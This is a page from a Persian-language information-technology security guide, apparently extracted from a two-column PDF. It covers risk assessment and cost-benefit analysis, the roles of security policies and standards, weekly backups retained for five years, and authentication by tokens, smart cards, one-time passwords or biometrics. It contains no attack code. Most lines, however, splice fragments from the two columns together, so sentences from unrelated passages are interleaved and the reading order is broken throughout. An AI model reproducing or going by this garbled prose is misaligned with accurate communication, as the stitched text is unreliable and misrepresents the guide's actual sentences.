‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ‬ ‫ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ‬
‫ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺑﺎﻳﺪ ﭼـﻪ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ ﺭﺍ ﻣﺘﺤﻤـﻞ‬
‫ﺷﻮﻳﺪ‪ .‬ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﺪ ﻛﻪ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺍﻭﻝ ﻭ ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺩﻭﻡ ﺑﺮﺩﺍﺭﻳﺪ‪ ،‬ﻭ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺭﺍ‬
‫ﺑﻪ ﺳﺎﻟﻬﺎﻱ ﺑﻌﺪ ﻣﻮﻛﻮﻝ ﻛﻨﻴﺪ‪ .‬ﻳﻚ ﻓﺎﻳﺪﺓ ﺩﻳﮕﺮ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ‬ ‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑـﻪ ﺗـﺸﺮﻳﺢ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺳﻴﺎﺳـﺖ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﺷﺮﻛﺖ ﻣﺘﻘﺎﻋﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ‬ ‫ﺍﻣﻨﻴﺘﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻛـﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻛﺎﺭﻣﻨـﺪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻳﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺷﺒﻜﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﻧﻘـﺸﻲ ﺑـﺮﺍﻱ ﺍﻳﻔـﺎ ﻛـﺮﺩﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﻳﺘﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ‬


‫ﻏﺎﻟﺐ ﻣﺪﻳﺮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﺼﺮﻱ ﺩﺍﺭﻧـﺪ‪ ،‬ﻭﻟـﻲ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻓﺼﻮﻝ ﺍﻧﺘﻬﺎﻳﻲ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺯ ﻛﺘـﺎﺏ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺑـﺎ ﻣﺨـﺎﻃﺮﻩﺍﻱ‬
‫ﻣﻮﺍﺟﻪ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺳﺎﻻﻧﺔ ﺯﻳﺎﺩﻱ ﺷـﻮﺩ‬ ‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴﺖ‬
‫)ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﺠﻤﻮﻉ ﺧﺴﺎﺭﺗﻬﺎ ﻭ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮﺍﺕ ﻫﻤﺔ ﺁﻧﭽﻪ ﻫﻢﺍﻛﻨـﻮﻥ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴـﺪ(‪ ،‬ﺁﻧﮕـﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﮕﺎﻥ ﻧﻴﺴﺖ‪ .‬ﻫﺮ ﭼﻘـﺪﺭ ﻛـﻪ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺷـﻤﺎ‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺪﻳﺮﻳﺖ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ ﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺟﺘﻨـﺎﺏ ﺍﺯ ﻭﻗـﻮﻉ‬ ‫ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﻮﻧﺪ‪ ،‬ﺑﻪ ﻫﻤﺎﻥ ﻣﻴـﺰﺍﻥ ﻫﺰﻳﻨـﺔ ﺁﻧﻬـﺎ ﺑـﺎﻻﺗﺮ ﺧﻮﺍﻫـﺪ‬
‫ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺭﻭﻱ ﻣﻨـﺎﺑﻊ ﻭ ﻛﺎﺭﻛﻨـﺎﻥ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑﻴـﺸﺘﺮﻱ‬ ‫ﺭﻓﺖ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺑـﺎﻻﺗﺮﻱ ﺑﻬـﺮﻩ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﻻ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ‬ ‫ﻣﻲﺑﺮﻧﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺟﺎﻧﺐ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺪﺭﺗﻤﻨﺪ ‪ -‬ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳـﺨﺖ ﻭ‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﺎ ﺳـﺨﻨﺎﻥ ﻣﺒﻬﻤـﻲ ﻣﺜـﻞ "ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ‬ ‫ﺑﻌﻀﹰﺎ ﺧﻄﺮﻧﺎﻛﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻧﻴﺴﺘﻨﺪ‬
‫ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﺑﻌــﺪ ﺍﺯ ﺍﻋﻼﻣﻴــﺔ ﺑﻌــﺪﻱ ‪ CERT/CC‬ﺭﻭﻱ‬ ‫ﻭ ﺩﺭ ﻗﺒﺎﻝ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺁﻥ ﻧﻴﺰ ﭘﺎﺳﺨﮕﻮ ﻧﻤﻲﺑﺎﺷﻨﺪ ‪ -‬ﻣﻮﺭﺩ ﺗﻬﺪﻳﺪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻧﻔﻮﺫﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺭﺥ ﺩﻫﺪ" ﺑﻪ ﻣﺪﻳﺮﻳﺖ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴـﺪ‪،‬‬ ‫ﻭﺍﻗﻊ ﺷﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ‬
‫ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳﺖ ﻛﻪ ﻧﺘﻴﺠﻪﺍﻱ ﺟﺰ ﻳـﻚ ﻧﮕﺮﺍﻧـﻲ ﺑـﺴﻴﺎﺭ ﻣﻼﻳـﻢ‬ ‫ﻗﺪﺭﺕ ﺳﻴﺎﺳـﻲ ﺑﻬـﺮﻩﻣﻨـﺪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ‪ ،‬ﺑﻌـﻀﻲ ﺍﺯ‬
‫)ﺁﻥ ﻫﻢ ﺗﻨﻬﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ( ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﺪ!‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺣﺴﺎﺱ ﻛﻨﻨﺪ ﻛﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻨﺎﺳﺐ ﺑﺴﻴﺎﺭ ﭘﺮﺧﺮﺝ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ‬
‫ﻧﻘﺶ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺑﺪﻭﻥ ﺻﺮﻑ ﻭﻗﺖ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻳﻦ ﺧﻄﺮﺍﺕ‬
‫ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺗﻌﺮﻳﻒ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻛﻤﻚ ﻣﻲﻛﻨـﺪ‬ ‫ﻭ ﺑﺪﻭﻥ ﺗﻮﺟﻪ ﺑﻪ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨـﺪ‪.‬‬
‫ﻭ ﻧﻴﺰ ﮔﺎﻣﻬﺎﻳﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳـﺮﻣﺎﻳﻪﻫـﺎ‬ ‫ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺍﺭﺍﺋـﻪ‬
‫ﺑﺮﺩﺍﺷﺘﻪ ﺷﻮﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﮔﺎﻣﻬـﺎﻱ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺣـﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺗـﺄﻣﻴﻦ‬
‫ﺣﺪﺍﻛﺜﺮ ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺗـﺪﻭﻳﻦ‬
‫ﺯﻣﺎﻧﻲ‪ ،‬ﭘﺮﺳﻨﻠﻲ ﻭ ﻣﺎﻟﻲ ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻛﺮﺩ‪ .‬ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺑﺴﻴﺎﺭ ﺳﺎﺩﺓ ﭼﻨـﺪ ﺻـﻔﺤﻪﺍﻱ‬
‫ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﺣﺘﻤﺎﻻﺕ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬ ‫ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ‪ ،‬ﺷﻤﺎ ﺑﺎﻳـﺪ‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﻳـﻚ ﺳﻴﺎﺳـﺖ‬ ‫ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﻴﺪ ﻛﻪ ﻃﺒﻖ ﺑﺮﻧﺎﻣﻪ ﻋﻤﻞ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٥٠‬‬

‫ﺍﻣﻦ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻣﺮﺍﻗﺒـﺖ ﺑـﻪ ﻋﻤـﻞ‬ ‫ﺧﺎﺹ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ؛ ﻣﺜﻞ ﺳﻴﺎﺳﺖ ﭘـﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺳﻴﺎﺳـﺖ‬
‫ﻣﻲﺁﻳﺪ‪ .‬ﺣﺪﺍﻗﻞ ﻳﻚ ﻫﻔﺘـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﭘـﺸﺘﻴﺒﺎﻥ‬ ‫ﺩﺍﺩﻩ ﻫﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪.‬‬
‫ﻛﺎﻣــﻞ ﺍﺯ ﻛــﻞ ﺳﻴــﺴﺘﻢ ﺗﻬﻴــﻪ ﺷــﻮﺩ‪ .‬ﻫﻤــﺔ ﺭﺳــﺎﻧﻪﻫــﺎﻱ‬ ‫ﺳﻮﻣﻴﻦ ﺭﻭﻳﻜﺮﺩﻱ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﺁﻥ ﺑﻬﺮﻩ ﺟﺴﺘﻪﺍﻧـﺪ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑﺎﻳـﺪ ﺩﺭ ﻧـﻮﻉ ﺧـﻮﺩ ﻭﺍﺟـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬ ‫ﻭ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺮﻛﺘﻬﺎ ﺑﺎ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑﻞ ﺍﺟـﺮﺍ ﺍﺳـﺖ‬
‫ﭘﺬﻳﺮﻓﺘﻪﺷﺪﺓ ﺻﻨﻌﺘﻲ ﺑﺎﺷﻨﺪ ﺗـﺎ ﺣـﺪﺍﻗﻞ ﺑﻌـﺪ ﺍﺯ ﭘـﻨﺞ ﺳـﺎﻝ‬ ‫ﺩﺍﺷﺘﻦ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﺎﺩﻩ ﻭ ﻣﺨﺘـﺼﺮ‬
‫ﺑﺎﻗﻲﻣﺎﻧﺪﻥ ﺩﺭ ﻳﻚ ﺍﻧﺒﺎ ﹺﺭ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺐ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ‬ ‫ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ‪ ،‬ﺭﻭﻳﻜﺮﺩ‬
‫ﺑﺎﺯ ﻫﻢ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺑﺎﺷﺪ‪.‬‬ ‫ﺁﺧﺮ ﺭﺍ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺗﺸﺮﻳﺢ ﺧﻮﺍﻫﻴﻢ ﻛـﺮﺩ ﻭ ﻣﻨـﺎﺑﻊ ﺑﻴـﺸﺘﺮ ﺩﺭ‬
‫ﺍﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻧـﺎﻡ ﻫـﻴﭻ ﻣﻜـﺎﻧﻴﺰﻡ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻳـﺎ ﺑـﺴﺘﺔ‬ ‫ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻧﻴﺰ ﺩﺭ ﺑﺨﺶ ﻣﺮﺍﺟﻊ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺧﺎﺹ ﺭﺍ ﺫﻛﺮ ﻧﻤﻲﻛﻨﺪ؛ ﻫﺮﭼﻨﺪ ﺁﻥ ﭼﻴﺰﻱ ﻛـﻪ ﺑﺎﻳـﺪ‬ ‫ﺳﻴﺎﺳﺖ ﺳﻪ ﻧﻘﺶ ﻋﻤﺪﻩ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻭﻝ ﻣﺸﺨﺺ ﻣﻲﻛﻨـﺪ ﺍﺯ‬
‫ﺫﺧﻴﺮﻩ ﺷﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﭼﻪ ﻣﺪﺕ ﺑﺎﻳﺪ ﺫﺧﻴـﺮﻩ ﮔـﺮﺩﺩ ﻭ ﭼﻨـﺪ‬ ‫ﭼﻪ ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﻣﻲﺷﻮﺩ ﻭ ﭼﺮﺍ؛ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺮﺑﻮﻁ‬
‫ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﺭﺍ ﺑﻮﺿﻮﺡ ﻋﻨﻮﺍﻥ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻳﻦ ﺣﻔﺎﻇﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻣـﻲﻧﻤﺎﻳـﺪ؛ ﻭ ﺳـﻮﻡ ﺍﻳﻨﻜـﻪ‬
‫ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬ ‫ﺯﻣﻴﻨﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻔﺴﻴﺮ ﻭ ﺣﻞ ﺩﺭﮔﻴﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﺁﻳﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ‪ .‬ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳﻴﺎﺳـﺖ ﻧﺒﺎﻳـﺪ‬
‫ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻚ‬ ‫ﺑﻴﺎﻳﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻓﻬﺮﺳﺖ ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﻣﺎﺷﻴﻦﺁﻻﺕ ﻭ ﺍﻓﺮﺍﺩ )ﺑـﺎ‬
‫ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺁﻥ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ‬ ‫ﻧﺎﻣﻬﺎﻳﺸﺎﻥ(‪ .‬ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﻛﻠﻲ ﺑﺎﺷـﺪ ﻭ ﺩﺭ ﻃـﻮﻝ ﺯﻣـﺎﻥ ﺑﻨـﺪﺭﺕ‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧـﺸﺎﻧﺔ ﺗﺄﻳﻴﺪﻛﻨﻨـﺪﻩ ﺑـﺮﺍﻱ‬ ‫ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﻮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﺍﺛﺒﺎﺕ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﻲ ﺗـﻮﺍﻥ‬
‫ﺑﻮﺳــﻴﻠﺔ ﻳــﻚ ﻧــﺸﺎﻥ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ ،٧٨‬ﻳــﻚ ﻛــﺎﺭﺕ‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬
‫ﻫﻮﺷﻤﻨﺪ‪ ،٧٩‬ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣـﺼﺮﻑ‪ ،‬ﻳـﺎ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﺮﻓﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﻲ‪ ٨٠‬ﺗﺄﻳﻴﺪﺷﺪﻩ ﺻﻮﺭﺕ ﺩﺍﺩ‪ .‬ﺩﺭ ﻫﻴﭻ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫ﺯﻳﺴﺘ ﹺ‬
‫ﻻ ﺍﺯ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﺩﺭ ﻋﺒﺎﺭﺗﻬـﺎﻱ ﺁﻥ ﻣﻌﻤـﻮ ﹰ‬
‫ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑﻪ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ‪ ،‬ﻗﺎﺑﻞ ﺣﻤﻞ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﻓﻌﻞ "ﺑﺎﻳﺪ" ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻋﻤﻮﻣـﹰﺎ ﻣـﺴﺘﻘﻞ ﺍﺯ‬
‫ﺷﺮﻛﺖ ﺑﻮﺩﻩ‪ ،‬ﻳﺎ ﺑﻴﺮﻭﻥ ﺍﺯ ﺩﻓﺘـﺮ ﺧـﺼﻮﺻﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻓﻨﻲ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺣـﺪﺍﻗﻞ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﻗﺮﺍﺭﮔﺮﻓﺘﻪ‪ ،‬ﻧﺒﺎﻳـﺪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺗﻜﺮﺍﺭﺷـﺪﻧﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺭﻋﺎﻳﺖ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﺻﻠﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪﻩﺍﻧﺪ ﻭ ﺩﺭ ﻃـﻮﻝ‬
